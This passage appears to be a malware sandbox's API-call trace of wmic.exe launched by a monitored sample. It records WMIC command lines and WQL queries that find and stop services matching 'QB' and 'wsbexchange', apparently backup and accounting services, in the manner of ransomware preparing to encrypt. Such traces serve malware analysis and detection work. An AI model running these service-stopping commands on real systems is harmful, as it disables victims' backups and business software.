(Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0312.139] lstrlenW (lpString="NQDPDE") returned 6 [0312.139] malloc (_Size=0xe) returned 0x34cae88 [0312.139] lstrlenW (lpString="NQDPDE") returned 6 [0312.139] GetCurrentThreadId () returned 0x1014 [0312.139] GetCurrentProcess () returned 0xffffffff [0312.139] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x32bfab0 | out: TokenHandle=0x32bfab0*=0x2f8) returned 1 [0312.140] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x32bfaac | out: TokenInformation=0x0, ReturnLength=0x32bfaac) returned 0 [0312.140] malloc (_Size=0x118) returned 0x34cb9d8 [0312.140] GetTokenInformation (in: TokenHandle=0x2f8, TokenInformationClass=0x3, TokenInformation=0x34cb9d8, TokenInformationLength=0x118, ReturnLength=0x32bfaac | out: TokenInformation=0x34cb9d8, ReturnLength=0x32bfaac) returned 1 [0312.140] AdjustTokenPrivileges (in: TokenHandle=0x2f8, DisableAllPrivileges=0, NewState=0x34cb9d8*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0312.140] free (_Block=0x34cb9d8) [0312.140] CloseHandle (hObject=0x2f8) returned 1 [0312.140] lstrlenW (lpString="GET") returned 3 [0312.140] lstrlenW (lpString="call") returned 4 [0312.140] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="GET", cchCount2=3) returned 1 [0312.140] lstrlenW (lpString="LIST") returned 4 [0312.140] lstrlenW (lpString="call") returned 4 [0312.140] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="LIST", cchCount2=4) returned 1 [0312.140] lstrlenW (lpString="SET") returned 3 [0312.141] lstrlenW (lpString="call") returned 4 [0312.141] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="SET", cchCount2=3) returned 1 [0312.141] lstrlenW (lpString="CALL") returned 4 [0312.141] lstrlenW (lpString="call") returned 4 [0312.141] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="call", cchCount1=4, lpString2="CALL", cchCount2=4) returned 2 [0312.141] ??0CHString@@QAE@XZ () returned 0x32bfa70 [0312.141] GetCurrentThreadId () returned 0x1014 [0312.141] malloc (_Size=0xc) returned 0x34caea0 [0312.141] malloc (_Size=0xc) returned 0x34cae28 [0312.141] malloc (_Size=0xc) returned 0x34cae40 [0312.141] malloc (_Size=0xc) returned 0x34caeb8 [0312.141] malloc (_Size=0xc) returned 0x34c9880 [0312.141] SysStringLen (param_1="\\\\") returned 0x2 [0312.141] SysStringLen (param_1="NQDPDE") returned 0x6 [0312.141] malloc (_Size=0xc) returned 0x34cbe10 [0312.142] SysStringLen (param_1="\\\\NQDPDE") returned 0x8 [0312.142] SysStringLen (param_1="\\") returned 0x1 [0312.142] malloc (_Size=0xc) returned 0x34cbd68 [0312.142] SysStringLen (param_1="\\\\NQDPDE\\") returned 0x9 [0312.142] SysStringLen (param_1="root\\cimv2") returned 0xa [0312.142] free (_Block=0x34cbe10) [0312.142] free (_Block=0x34c9880) [0312.142] free (_Block=0x34caeb8) [0312.142] free (_Block=0x34cae40) [0312.142] free (_Block=0x34cae28) [0312.142] free (_Block=0x34caea0) [0312.142] malloc (_Size=0xc) returned 0x34cbd80 [0312.142] malloc (_Size=0xc) returned 0x34cbea0 [0312.142] malloc (_Size=0xc) returned 0x34cbfc0 [0312.142] WbemLocator:IWbemLocator:ConnectServer (in: This=0x35b4ba8, strNetworkResource="\\\\NQDPDE\\root\\cimv2", strUser=0x0, strPassword=0x0, strLocale="ms_409", lSecurityFlags=0, strAuthority=0x0, pCtx=0x0, ppNamespace=0xa68564 | out: ppNamespace=0xa68564*=0x3610b40) returned 0x0 [0312.155] free (_Block=0x34cbfc0) [0312.155] free (_Block=0x34cbea0) [0312.155] free (_Block=0x34cbd80) [0312.155] CoSetProxyBlanket (pProxy=0x3610b40, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0312.156] free (_Block=0x34cbd68) [0312.156] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0312.156] ??0CHString@@QAE@XZ () returned 0x32bfa68 [0312.156] GetCurrentThreadId () returned 0x1014 [0312.156] malloc (_Size=0x38) returned 0x34cb9d8 [0312.156] malloc (_Size=0x28) returned 0x34cba18 [0312.156] malloc (_Size=0x28) returned 0x34cba48 [0312.156] malloc (_Size=0x38) returned 0x34cba78 [0312.156] malloc (_Size=0x38) returned 0x34cbab8 [0312.156] malloc (_Size=0x24) returned 0x34cbaf8 [0312.156] malloc (_Size=0xc) returned 0x34caea0 [0312.156] lstrlenA (lpString="") returned 0 [0312.156] malloc (_Size=0x2) returned 0x34c2788 [0312.156] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x34c2788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0312.156] free (_Block=0x34c2788) [0312.156] malloc (_Size=0x38) returned 0x34cbb28 [0312.156] malloc (_Size=0x24) returned 0x34cbb68 [0312.156] malloc (_Size=0xc) returned 0x34cae28 [0312.157] free (_Block=0x34caea0) [0312.157] IWbemServices:GetObject (in: This=0x3610b40, strObjectPath="Win32_Service", lFlags=131072, pCtx=0x0, ppObject=0x32bfa40*=0x0, ppCallResult=0x0 | out: ppObject=0x32bfa40*=0x36100f8, ppCallResult=0x0) returned 0x0 [0312.244] malloc (_Size=0xc) returned 0x34caea0 [0312.244] IWbemClassObject:GetMethod (in: This=0x36100f8, wszName="stopservice", lFlags=0, ppInSignature=0x32bfa5c, ppOutSignature=0x32bfa3c | out: ppInSignature=0x32bfa5c*=0x0, ppOutSignature=0x32bfa3c*=0x35e69f8) returned 0x0 [0312.244] free (_Block=0x34caea0) [0312.244] IUnknown:Release (This=0x35e69f8) returned 0x0 [0312.244] IUnknown:Release (This=0x36100f8) returned 0x0 [0312.244] ??0CHString@@QAE@XZ () returned 0x32bf920 [0312.244] GetCurrentThreadId () returned 0x1014 [0312.244] malloc (_Size=0xc) returned 0x34caea0 [0312.245] lstrlenA (lpString="") returned 0 [0312.245] malloc (_Size=0x2) returned 0x34c2788 [0312.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x34c2788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0312.245] free (_Block=0x34c2788) [0312.245] malloc (_Size=0xc) returned 0x34cae40 [0312.245] lstrlenA (lpString="") returned 0 [0312.245] malloc (_Size=0x2) returned 0x34c2788 [0312.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa22b74, cbMultiByte=-1, lpWideCharStr=0x34c2788, cchWideChar=1 | out: lpWideCharStr="") returned 1 [0312.245] free (_Block=0x34c2788) [0312.245] malloc (_Size=0xc) returned 0x34caeb8 [0312.245] free (_Block=0x34cae40) [0312.245] malloc (_Size=0xc) returned 0x34cae40 [0312.245] lstrlenA (lpString="SELECT * FROM ") returned 14 [0312.245] malloc (_Size=0x1e) returned 0x34cbb98 [0312.245] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa24354, cbMultiByte=-1, lpWideCharStr=0x34cbb98, cchWideChar=15 | out: lpWideCharStr="SELECT * FROM ") returned 15 [0312.245] free (_Block=0x34cbb98) [0312.245] malloc (_Size=0xc) returned 0x34c9880 [0312.245] SysStringLen (param_1="SELECT * FROM ") returned 0xe [0312.245] SysStringLen (param_1="Win32_Service") returned 0xd [0312.246] free (_Block=0x34cae40) [0312.246] malloc (_Size=0xc) returned 0x34cae40 [0312.246] malloc (_Size=0xc) returned 0x34cc098 [0312.246] lstrlenA (lpString=" WHERE ") returned 7 [0312.246] malloc (_Size=0x10) returned 0x34cc020 [0312.246] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0xa237a8, cbMultiByte=-1, lpWideCharStr=0x34cc020, cchWideChar=8 | out: lpWideCharStr=" WHERE ") returned 8 [0312.246] free (_Block=0x34cc020) [0312.246] malloc (_Size=0xc) returned 0x34cc0b0 [0312.246] SysStringLen (param_1=" WHERE ") returned 0x7 [0312.246] SysStringLen (param_1="name like '%%wsbexchange%%'") returned 0x1b [0312.246] malloc (_Size=0xc) returned 0x34cc0c8 [0312.246] SysStringLen (param_1="SELECT * FROM Win32_Service") returned 0x1b [0312.246] SysStringLen (param_1=" WHERE name like '%%wsbexchange%%'") returned 0x22 [0312.246] free (_Block=0x34c9880) [0312.246] free (_Block=0x34cc0b0) [0312.246] free (_Block=0x34cc098) [0312.246] free (_Block=0x34cae40) [0312.246] malloc (_Size=0xc) returned 0x34cc008 [0312.247] IWbemServices:ExecQuery (in: This=0x3610b40, strQueryLanguage="WQL", strQuery="SELECT * FROM Win32_Service WHERE name like '%%wsbexchange%%'", lFlags=48, pCtx=0x0, ppEnum=0x32bf92c | out: ppEnum=0x32bf92c*=0x3614018) returned 0x0 [0312.266] free (_Block=0x34cc008) [0312.266] CoSetProxyBlanket (pProxy=0x3614018, dwAuthnSvc=0xffffffff, dwAuthzSvc=0x0, pServerPrincName=0x0, dwAuthnLevel=0x6, dwImpLevel=0x3, pAuthInfo=0x0, dwCapabilities=0x0) returned 0x0 [0312.275] IEnumWbemClassObject:Next (in: This=0x3614018, lTimeout=-1, uCount=0x1, apObjects=0x32bf928, puReturned=0x32bf918 | out: apObjects=0x32bf928*=0x0, puReturned=0x32bf918*=0x0) returned 0x1 [0313.496] IUnknown:Release (This=0x3614018) returned 0x0 [0313.499] free (_Block=0x34cc0c8) [0313.499] free (_Block=0x34caeb8) [0313.499] free (_Block=0x34caea0) [0313.499] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0313.499] free (_Block=0x34cae28) [0313.499] free (_Block=0x34cbaf8) [0313.499] free (_Block=0x34cbab8) [0313.499] free (_Block=0x34cba78) [0313.499] free (_Block=0x34cba48) [0313.499] free (_Block=0x34cba18) [0313.499] free (_Block=0x34cbb68) [0313.500] free (_Block=0x34cbb28) [0313.500] free (_Block=0x34cb9d8) [0313.500] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0313.500] GetCurrentThreadId () returned 0x1014 [0313.500] ??0CHString@@QAE@PBG@Z () returned 0x32bfae0 [0313.500] ??YCHString@@QAEABV0@PBG@Z () returned 0x32bfae0 [0313.500] malloc (_Size=0x800) returned 0x34cc0e0 [0313.500] LoadStringW (in: hInstance=0x0, uID=0xb3bc, lpBuffer=0x34cc0e0, cchBufferMax=1024 | out: lpBuffer="No Instance(s) Available.\r\n") returned 0x1b [0313.500] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 28 [0313.500] malloc (_Size=0x1c) returned 0x34cb9d8 [0313.500] WideCharToMultiByte (in: CodePage=0x1, dwFlags=0x0, lpWideCharStr="No Instance(s) Available.\r\n", cchWideChar=-1, lpMultiByteStr=0x34cb9d8, cbMultiByte=28, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="No Instance(s) Available.\r\n", lpUsedDefaultChar=0x0) returned 28 [0313.500] __iob_func () returned 0x776f2608 [0313.501] fprintf (in: _File=0x776f2628, _Format="%s" | out: _File=0x776f2628) returned 27 [0313.501] __iob_func () returned 0x776f2608 [0313.501] fflush (in: _File=0x776f2628 | out: _File=0x776f2628) returned 0 [0313.501] free (_Block=0x34cb9d8) [0313.501] free (_Block=0x34cc0e0) [0313.501] ??1CHString@@QAE@XZ () returned 0x1 [0313.501] WbemLocator:IUnknown:Release (This=0x3610b40) returned 0x0 [0313.502] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0313.502] _kbhit () returned 0x0 [0313.512] free (_Block=0x34c2ee8) [0313.512] free (_Block=0x34cac48) [0313.512] free (_Block=0x34cab58) [0313.512] free (_Block=0x34cab10) [0313.512] free (_Block=0x34cab40) [0313.512] free (_Block=0x34cb058) [0313.512] free (_Block=0x34cb198) [0313.512] free (_Block=0x34c9da8) [0313.512] free (_Block=0x34cb228) [0313.512] free (_Block=0x34cab88) [0313.512] free (_Block=0x34c2d00) [0313.512] free (_Block=0x34c0520) [0313.512] free (_Block=0x34cbca8) [0313.513] free (_Block=0x34cac18) [0313.513] free (_Block=0x34caed0) [0313.513] free (_Block=0x34cbc68) [0313.513] free (_Block=0x34cbc28) [0313.513] free (_Block=0x34cae58) [0313.513] free (_Block=0x34cae10) [0313.513] free (_Block=0x34cae70) [0313.513] free (_Block=0x34cbbf8) [0313.513] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0313.513] free (_Block=0x34cb0f8) [0313.513] free (_Block=0x34cabb8) [0313.513] free (_Block=0x34c0568) [0313.513] free (_Block=0x34cad08) [0313.513] free (_Block=0x34cb1e0) [0313.513] free (_Block=0x34cac30) [0313.513] free (_Block=0x34c2ba0) [0313.513] free (_Block=0x34c26b0) [0313.513] free (_Block=0x34c26f8) [0313.513] free (_Block=0x34c2740) [0313.513] free (_Block=0x34cae88) [0313.513] free (_Block=0x34c27c8) [0313.513] free (_Block=0x34c0508) [0313.514] free (_Block=0x34c2d40) [0313.514] free (_Block=0x34c04f0) [0313.514] free (_Block=0x34c29c0) [0313.514] free (_Block=0x34c04d8) [0313.514] free (_Block=0x34c2a20) [0313.514] free (_Block=0x34c2908) [0313.514] free (_Block=0x34c2920) [0313.514] free (_Block=0x34c28d0) [0313.514] free (_Block=0x34c28e8) [0313.514] free (_Block=0x34c2940) [0313.514] free (_Block=0x34c2958) [0313.514] free (_Block=0x34c04a0) [0313.514] free (_Block=0x34c04b8) [0313.514] free (_Block=0x34c2860) [0313.514] free (_Block=0x34c2878) [0313.514] free (_Block=0x34c2828) [0313.514] free (_Block=0x34c2840) [0313.514] free (_Block=0x34c2898) [0313.514] free (_Block=0x34c28b0) [0313.514] free (_Block=0x34c27f0) [0313.515] free (_Block=0x34c2808) [0313.515] free (_Block=0x34c27a0) [0313.515] free (_Block=0x34c1200) [0313.515] free (_Block=0x34cafd0) [0313.515] WbemLocator:IUnknown:Release (This=0x35b4ba8) returned 0x2 [0313.515] WbemLocator:IUnknown:Release (This=0x35baa18) returned 0x0 [0313.516] WbemLocator:IUnknown:Release (This=0x35b4ba8) returned 0x1 [0313.516] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0313.516] WbemLocator:IUnknown:Release (This=0x35b4ba8) returned 0x0 [0313.516] free (_Block=0x34caca8) [0313.516] free (_Block=0x34cac00) [0313.516] free (_Block=0x34c2bc0) [0313.516] free (_Block=0x34cacc0) [0313.516] free (_Block=0x34cadb0) [0313.516] free (_Block=0x34c2c40) [0313.516] free (_Block=0x34cab70) [0313.516] free (_Block=0x34cac90) [0313.516] free (_Block=0x34c2a40) [0313.516] free (_Block=0x34cab28) [0313.516] free (_Block=0x34cade0) [0313.516] free (_Block=0x34c2ac0) [0313.516] free (_Block=0x34cabd0) [0313.517] free (_Block=0x34cadf8) [0313.517] free (_Block=0x34c2b60) [0313.517] free (_Block=0x34cac78) [0313.517] free (_Block=0x34cacf0) [0313.517] free (_Block=0x34c2ce0) [0313.517] free (_Block=0x34cad38) [0313.517] free (_Block=0x34cad50) [0313.517] free (_Block=0x34c2ae0) [0313.517] free (_Block=0x34caba0) [0313.517] free (_Block=0x34cadc8) [0313.517] free (_Block=0x34c2d20) [0313.517] free (_Block=0x34c9850) [0313.517] free (_Block=0x34cacd8) [0313.517] free (_Block=0x34c2aa0) [0313.517] free (_Block=0x34cac60) [0313.517] free (_Block=0x34cad80) [0313.517] free (_Block=0x34c2b20) [0313.517] free (_Block=0x34cad98) [0313.517] free (_Block=0x34cabe8) [0313.518] free (_Block=0x34c2b80) [0313.518] free (_Block=0x34cad20) [0313.518] free (_Block=0x34cad68) [0313.518] free (_Block=0x34c2c00) [0313.518] free (_Block=0x34c9958) [0313.518] free (_Block=0x34c98c8) [0313.518] free (_Block=0x34c2a60) [0313.518] free (_Block=0x34c99a0) [0313.518] free (_Block=0x34c98f8) [0313.518] free (_Block=0x34c2ca0) [0313.518] free (_Block=0x34c98b0) [0313.518] free (_Block=0x34c9868) [0313.518] free (_Block=0x34c2b00) [0313.518] free (_Block=0x34c9898) [0313.518] free (_Block=0x34c9928) [0313.518] free (_Block=0x34c2a80) [0313.518] free (_Block=0x34c9970) [0313.518] free (_Block=0x34c9940) [0313.518] free (_Block=0x34c2a00) [0313.519] free (_Block=0x34c9988) [0313.519] free (_Block=0x34c9910) [0313.519] free (_Block=0x34c29e0) [0313.519] free (_Block=0x34c99b8) [0313.519] free (_Block=0x34c97f0) [0313.519] free (_Block=0x34c2d60) [0313.519] free (_Block=0x34c9808) [0313.519] free (_Block=0x34c98e0) [0313.519] free (_Block=0x34c2cc0) [0313.519] free (_Block=0x34c9820) [0313.519] free (_Block=0x34c9838) [0313.519] free (_Block=0x34c29a0) [0313.519] CoUninitialize () [0313.560] exit (_Code=0) [0313.560] free (_Block=0x34caee8) [0313.560] free (_Block=0x34c1008) [0313.560] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0313.560] free (_Block=0x34c2e10) [0313.560] free (_Block=0x34c27e0) [0313.560] free (_Block=0x34c0fe8) [0313.560] free (_Block=0x34c0fc8) [0313.560] free (_Block=0x34c0f98) [0313.560] free (_Block=0x34c0f78) [0313.560] free (_Block=0x34c0f48) [0313.560] free (_Block=0x34c0f08) [0313.561] free (_Block=0x34c0ee8) [0313.561] ??1CHString@@QAE@XZ () returned 0x6d7c65f8 [0313.561] free (_Block=0x34c2c20) Thread: id = 327 os_tid = 0xfd0 Thread: id = 328 os_tid = 0x1174 Thread: id = 329 os_tid = 0x10f8 Thread: id = 330 os_tid = 0x1344 Process: id = "33" image_name = "wmic.exe" filename = "c:\\windows\\syswow64\\wbem\\wmic.exe" page_root = "0x738ec000" os_pid = "0x2c0" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "5" os_parent_pid = "0x13b8" cmd_line = "\"C:\\WINDOWS\\System32\\Wbem\\WMIC.exe\" path Win32_Service where \"name like '%%QB%%'\" call stopservice" cur_dir = "C:\\Users\\FD1HVy\\Desktop\\" os_username = "NQDPDE\\FD1HVy" bitness = "32" os_groups = "NQDPDE\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000fd03" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Thread: id = 332 os_tid = 0xe10 [0314.048] GetModuleHandleA (lpModuleName=0x0) returned 0xa20000 [0314.048] __set_app_type (_Type=0x1) [0314.048] __p__fmode () returned 0x776f3c14 [0314.048] __p__commode () returned 0x776f49ec [0314.048] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0xa59af0) returned 0x0 [0314.048] __wgetmainargs (in: _Argc=0xa681a8, _Argv=0xa681ac, _Env=0xa681b0, _DoWildCard=0, _StartInfo=0xa681bc | out: _Argc=0xa681a8, _Argv=0xa681ac, _Env=0xa681b0) returned 0 [0314.049] ??0CHString@@QAE@XZ () returned 0xa685ec [0314.049] malloc (_Size=0x18) returned 0x2c80ed8 [0314.049] malloc (_Size=0x38) returned 0x2c80ef8 [0314.050] malloc (_Size=0x28) returned 0x2c80f38 [0314.050] malloc (_Size=0x18) returned 0x2c80f68 [0314.050] malloc (_Size=0x24) returned 0x2c80f88 [0314.050] malloc (_Size=0x18) returned 0x2c80fb8 [0314.050] malloc (_Size=0x18) returned 0x2c80fd8 [0314.050] ??0CHString@@QAE@XZ () returned 0xa688fc [0314.050] malloc (_Size=0x18) returned 0x2c80ff8 [0314.050] ?Empty@CHString@@QAEXXZ () returned 0x6d7c65f8 [0314.050] SetConsoleCtrlHandler (HandlerRoutine=0xa53cc0, Add=1) returned 1 [0314.050] _onexit (_Func=0xa5f370) returned 0xa5f370 [0314.050] _onexit (_Func=0xa5f380) returned 0xa5f380 [0314.050] _onexit (_Func=0xa5f390) returned 0xa5f390 [0314.051] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1 [0314.051] ResolveDelayLoadedAPI () returned 0x74a22590 [0314.051] CoInitializeEx (pvReserved=0x0, dwCoInit=0x0) returned 0x0 [0314.057] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x1, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0 [0314.069] CoCreateInstance (in: rclsid=0xa26a74*(Data1=0x4590f811, Data2=0x1d3a, Data3=0x11d0, Data4=([0]=0x89, [1]=0x1f, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), pUnkOuter=0x0, dwClsContext=0x1, riid=0xa26a84*(Data1=0xdc12a687, Data2=0x737f, Data3=0x11cf, Data4=([0]=0x88, [1]=0x4d, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x4b, [6]=0x2e, [7]=0x24)), ppv=0xa68510 | out: ppv=0xa68510*=0x2ea4748) returned 0x0 [0314.098] GetCurrentProcess () returned 0xffffffff [0314.098] OpenProcessToken (in: ProcessHandle=0xffffffff, DesiredAccess=0x28, TokenHandle=0x2b0f8d8 | out: TokenHandle=0x2b0f8d8*=0x194) returned 1 [0314.098] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x3, TokenInformation=0x0, TokenInformationLength=0x0, ReturnLength=0x2b0f8d4 | out: TokenInformation=0x0, ReturnLength=0x2b0f8d4) returned 0 [0314.098] malloc (_Size=0x118) returned 0x2c826b0 [0314.098] GetTokenInformation (in: TokenHandle=0x194, TokenInformationClass=0x3, TokenInformation=0x2c826b0, TokenInformationLength=0x118, ReturnLength=0x2b0f8d4 | out: TokenInformation=0x2c826b0, ReturnLength=0x2b0f8d4) returned 1 [0314.099] AdjustTokenPrivileges (in: TokenHandle=0x194, DisableAllPrivileges=0, NewState=0x2c826b0*(PrivilegesCount=0x17, Privileges=((Luid.LowPart=0x5, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x8, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x9, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xa, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xb, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xc, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xd, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xe, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0xf, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x11, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x12, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x13, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x14, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x16, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x17, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x18, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x19, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1c, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x1d, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x1e, Luid.HighPart=0, Attributes=0x3), (Luid.LowPart=0x21, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x22, Luid.HighPart=0, Attributes=0x2), (Luid.LowPart=0x23, Luid.HighPart=0, Attributes=0x2))), BufferLength=0x0, PreviousState=0x0, ReturnLength=0x0 | out: PreviousState=0x0, ReturnLength=0x0) returned 1 [0314.099] free (_Block=0x2c826b0) [0314.099] CloseHandle (hObject=0x194) returned 1 [0314.099] malloc (_Size=0x40) returned 0x2c826b0 [0314.099] malloc (_Size=0x40) returned 0x2c826f8 [0314.099] malloc (_Size=0x40) returned 0x2c82740 [0314.099] SetThreadUILanguage (LangId=0x0) returned 0x810409 [0314.103] _vsnwprintf (in: _Buffer=0x2c82740, _BufferCount=0x1f, _Format="ms_%x", _ArgList=0x2b0f860 | out: _Buffer="ms_409") returned 6 [0314.103] malloc (_Size=0x20) returned 0x2c811f0 [0314.103] GetComputerNameW (in: lpBuffer=0x2c811f0, nSize=0x2b0f8c4 | out: lpBuffer="NQDPDE", nSize=0x2b0f8c4) returned 1 [0314.103] lstrlenW (lpString="NQDPDE") returned 6 [0314.103] malloc (_Size=0xe) returned 0x2c82788 [0314.103] lstrlenW (lpString="NQDPDE") returned 6 [0314.103] ResolveDelayLoadedAPI () returned 0x7444db00 [0314.104] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x0, nSize=0x2b0f8d8 | out: lpNameBuffer=0x0, nSize=0x2b0f8d8) returned 0x817000 [0314.106] GetLastError () returned 0xea [0314.106] malloc (_Size=0x1e) returned 0x2c827a0 [0314.106] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2c827a0, nSize=0x2b0f8d8 | out: lpNameBuffer="NQDPDE\\FD1HVy", nSize=0x2b0f8d8) returned 0x1 [0314.107] lstrlenW (lpString="") returned 0 [0314.107] lstrlenW (lpString="NQDPDE") returned 6 [0314.107] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="", cchCount2=0) returned 3 [0314.109] lstrlenW (lpString=".") returned 1 [0314.109] lstrlenW (lpString="NQDPDE") returned 6 [0314.109] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2=".", cchCount2=1) returned 3 [0314.109] lstrlenW (lpString="LOCALHOST") returned 9 [0314.109] lstrlenW (lpString="NQDPDE") returned 6 [0314.109] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="LOCALHOST", cchCount2=9) returned 3 [0314.109] lstrlenW (lpString="NQDPDE") returned 6 [0314.109] lstrlenW (lpString="NQDPDE") returned 6 [0314.109] CompareStringW (Locale=0x800, dwCmpFlags=0x20001, lpString1="NQDPDE", cchCount1=6, lpString2="NQDPDE", cchCount2=6) returned 2 [0314.109] free (_Block=0x2c82788) [0314.109] lstrlenW (lpString="NQDPDE") returned 6 [0314.109] malloc (_Size=0xe) returned 0x2c82788 [0314.109] lstrlenW (lpString="NQDPDE") returned 6 [0314.109] lstrlenW (lpString="NQDPDE") returned 6 [0314.109] malloc (_Size=0xe) returned 0x2c827c8 [0314.109] lstrlenW (lpString="NQDPDE") returned 6 [0314.110] malloc (_Size=0x4) returned 0x2c81218 [0314.110] malloc (_Size=0xc) returned 0x2c827e0 [0314.110] ResolveDelayLoadedAPI () returned 0x7745b870 [0314.120] malloc (_Size=0x18) returned 0x2c827f8 [0314.120] malloc (_Size=0xc) returned 0x2c82818 [0314.120] SysStringLen (param_1="IDENTIFY") returned 0x8 [0314.120] SysStringLen (param_1="ANONYMOUS") returned 0x9 [0314.121] SysStringLen (param_1="ANONYMOUS") returned 0x9 